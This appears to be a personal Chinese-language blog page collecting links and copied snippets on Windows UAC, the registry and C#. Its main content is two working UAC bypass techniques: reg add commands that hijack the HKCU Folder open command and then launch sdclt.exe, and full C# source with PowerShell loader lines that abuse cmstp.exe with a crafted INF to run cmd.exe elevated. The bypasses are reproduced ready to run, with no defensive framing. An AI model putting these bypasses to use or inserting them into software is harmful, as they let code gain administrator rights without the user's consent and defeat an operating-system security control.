2020年6月29日 星期一

使用Windows命令行reg控制注册表键值

https://www.qingsword.com/qing/163.html#windows-reg-1

https://www.qingsword.com/qing/163.html
沒有留言:

使用 sdclt 绕过 UAC 的新方法

https://nosec.org/home/detail/2205.html

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

%windir%\system32\sdclt.exe

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f


regedit.exe

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c regedit.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

explorer

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c explorer.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c prjSt.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c D:\2019千機專案原始碼\檔案監控_20200504\原始碼\pt_練習範例\本機電腦名稱及呼呼程式\prjSt\prjSt\bin\Debug\prjSt.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

taskkill /f /im cmd.exe
沒有留言:

2020年6月25日 星期四

C#开启和关闭UAC功能

https://www.cnblogs.com/zhaotianff/p/11596668.html
沒有留言:

【C#】如何激活UAC提示,使得程序获得管理员权限。

https://bbs.csdn.net/topics/330267100


沒有留言:

2020年6月24日 星期三

使用 sdclt 绕过 UAC 的新方法

繞過UAC系列之 SDCLT的利用


機碼登錄與三種格式(REG、INF、BAT)介紹



https://nosec.org/home/detail/2205.html

https://kknews.cc/zh-tw/code/k693ozq.html

https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/

=============================================================
/*
UAC Bypass using CMSTP.exe microsoft binary

Based on previous work from Oddvar Moe
Research on CMSTP.exe

And this PowerShell script of Tyler Applebaum
https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1

Code author: Andre Marques (@_zc00l)
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Windows;
using System.Runtime.InteropServices;


  public  class CMSTPBypass
    {
        // Our .INF file data!
        public static string InfData = @"[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
""HKLM"", ""SOFTWAREMicrosoftWindowsCurrentVersionApp PathsCMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"

[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""

";

        [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
        [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);

        public static string BinaryPath = @"c:\windows\system32\cmstp.exe";

        /* Generates a random named .inf file with command to be executed with UAC privileges */
        public static string SetInfFile(string CommandToExecute)
        {
            string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
            string TemporaryDir = @"C:\windows\temp";
            StringBuilder OutputFile = new StringBuilder();
            OutputFile.Append(TemporaryDir);
            OutputFile.Append("\\");
   
            OutputFile.Append(RandomFileName);
            OutputFile.Append(".inf");
            StringBuilder newInfData = new StringBuilder(InfData);
            newInfData.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
            File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
            return OutputFile.ToString();
        }

        public static bool Execute(string CommandToExecute)
        {
            if (!File.Exists(BinaryPath))
            {
                Console.WriteLine("Could not find cmstp.exe binary!");
                return false;
            }
            StringBuilder InfFile = new StringBuilder();
            InfFile.Append(SetInfFile(CommandToExecute));

            Console.WriteLine("Payload file written to " + InfFile.ToString());
            ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
            startInfo.Arguments = "/au " + InfFile.ToString();
            startInfo.UseShellExecute = false;
            Process.Start(startInfo);

            IntPtr windowHandle = new IntPtr();
            windowHandle = IntPtr.Zero;
            do
            {
                windowHandle = SetWindowActive("cmstp");
            } while (windowHandle == IntPtr.Zero);

            System.Windows.Forms.SendKeys.SendWait("{ENTER}");
            return true;
        }

        public static IntPtr SetWindowActive(string ProcessName)
        {
            Process[] target = Process.GetProcessesByName(ProcessName);
            if (target.Length == 0) return IntPtr.Zero;
            target[0].Refresh();
            IntPtr WindowHandle = new IntPtr();
            WindowHandle = target[0].MainWindowHandle;
            if (WindowHandle == IntPtr.Zero) return IntPtr.Zero;
            SetForegroundWindow(WindowHandle);
            ShowWindow(WindowHandle, 5);
            return WindowHandle;
        }
    }
===================================================================

Add-Type -TypeDefinition ([IO.File]::ReadAllText("Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTPUACBypass.dll"

 [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("CMSTPUACBypass.dll"))

[CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")

沒有留言:

在 UAC 啟動的情況下,如何讓程式每次執行時都是以 [系統管理員身份] 來執行

http://stenwang.blogspot.com/2015/11/uac-uac.html

https://www.kocpc.com.tw/archives/302302

https://blog.xuite.net/as15774/wretch/105856309-%5BC%23%5D+%E8%AE%93%E7%A8%8B%E5%BC%8F%E4%BB%A5%E7%B3%BB%E7%B5%B1%E7%AE%A1%E7%90%86%E5%93%A1%E8%BA%AB%E5%88%86%E5%9F%B7%E8%A1%8C%28UAC%29

https://lissam.pixnet.net/blog/post/21339021-%E5%9C%A8-uac-%E5%95%9F%E5%8B%95%E7%9A%84%E6%83%85%E6%B3%81%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E8%AE%93%E7%A8%8B%E5%BC%8F%E6%AF%8F%E6%AC%A1%E5%9F%B7%E8%A1%8C%E6%99%82

https://www.bilibili.com/video/BV1e4411v7oz?from=search&seid=4447783937126793261

沒有留言:

2020年6月23日 星期二

C# (CSharp) Sniffer packet Examples

https://csharp.hotexamples.com/examples/Sniffer/packet/-/php-packet-class-examples.html#0x6bf8f66cd50e0258b04906ce008b8156345c5573f2a4836000b975e35d0f4a73-29,,37,
沒有留言:
訂閱: 文章 (Atom)

WPF聊天室应用(ASP.NET Core SignalR)

  WPF聊天室应用(ASP.NET Core SignalR) https://www.bilibili.com/video/BV1Q741187Si?p=2 https://www.bilibili.com/video/BV1UV411e75T?from=search...

  • 在IIS上存取(Access)使用Office COM元件
    https://dotblogs.com.tw/v6610688/2015/02/19/iis_office_access_word_excel_com_interop_api_configuration https://dotblogs.com.tw/gelis/archi...
  • 網路封包監控c#
    key: Network Sniffer in .NET https://www.google.com/search?q=Network+Sniffer+in+.NET&oq=Network+Sniffer+in+.NET&aqs=chrome..69i57...
  • winpcap講解
    https://www.itread01.com/content/1548987697.html Winpcap網路程式設計一之前言,實驗要求,實驗目標 其他   · 發表  2019-02-01 ads Hi,大家好,現在計算機網路課程設計開始啦,本...